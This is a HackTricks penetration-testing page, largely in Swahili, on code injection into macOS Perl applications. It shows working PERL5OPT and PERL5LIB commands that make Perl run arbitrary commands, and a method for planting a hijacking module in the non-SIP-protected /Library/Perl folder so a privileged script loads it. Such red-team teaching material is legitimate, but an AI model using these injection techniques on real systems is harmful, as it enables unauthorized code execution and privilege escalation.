HackTricksmacOS Perl Applications Injection
Reading time: 3 minutes
tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
Kupitia PERL5OPT & PERL5LIB env variable
Kwa kutumia env variable PERL5OPT inawezekana kufanya perl itekeleze amri zisizo na mpangilio.
Kwa mfano, tengeneza script hii:
#!/usr/bin/perl
print "Hello from the Perl script!\n";
Sasa export the env variable na uendeleze perl script:
export PERL5OPT='-Mwarnings;system("whoami")'
perl test.pl # This will execute "whoami"
Chaguo lingine ni kuunda moduli ya Perl (mfano /tmp/pmod.pm):
#!/usr/bin/perl
package pmod;
system('whoami');
1; # Modules must return a true value
Na kisha tumia mabadiliko ya env:
PERL5LIB=/tmp/ PERL5OPT=-Mpmod
Kupitia utegemezi
Inawezekana kuorodhesha mpangilio wa folda za utegemezi wa Perl unaotembea:
perl -e 'print join("\n", @INC)'
Ambayo itarudisha kitu kama:
/Library/Perl/5.30/darwin-thread-multi-2level
/Library/Perl/5.30
/Network/Library/Perl/5.30/darwin-thread-multi-2level
/Network/Library/Perl/5.30
/Library/Perl/Updates/5.30.3
/System/Library/Perl/5.30/darwin-thread-multi-2level
/System/Library/Perl/5.30
/System/Library/Perl/Extras/5.30/darwin-thread-multi-2level
/System/Library/Perl/Extras/5.30
Baadhi ya folda zilizorejeshwa hata hazipo, hata hivyo, /Library/Perl/5.30 inapatikana na sio ililindwa na SIP na iko kabla ya folda zilizolindwa na SIP. Hivyo, mtu anaweza kutumia folda hiyo kuongeza utegemezi wa skripti ili skripti ya Perl yenye haki za juu iweze kuipakia.
warning
Hata hivyo, kumbuka kuwa unahitaji kuwa root ili kuandika katika folda hiyo na siku hizi utapata kipeperushi cha TCC:
.png)
Kwa mfano, ikiwa skripti inatumia use File::Basename; itakuwa inawezekana kuunda /Library/Perl/5.30/File/Basename.pm ili kufanya itekeleze msimbo usio na mipaka.
References
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.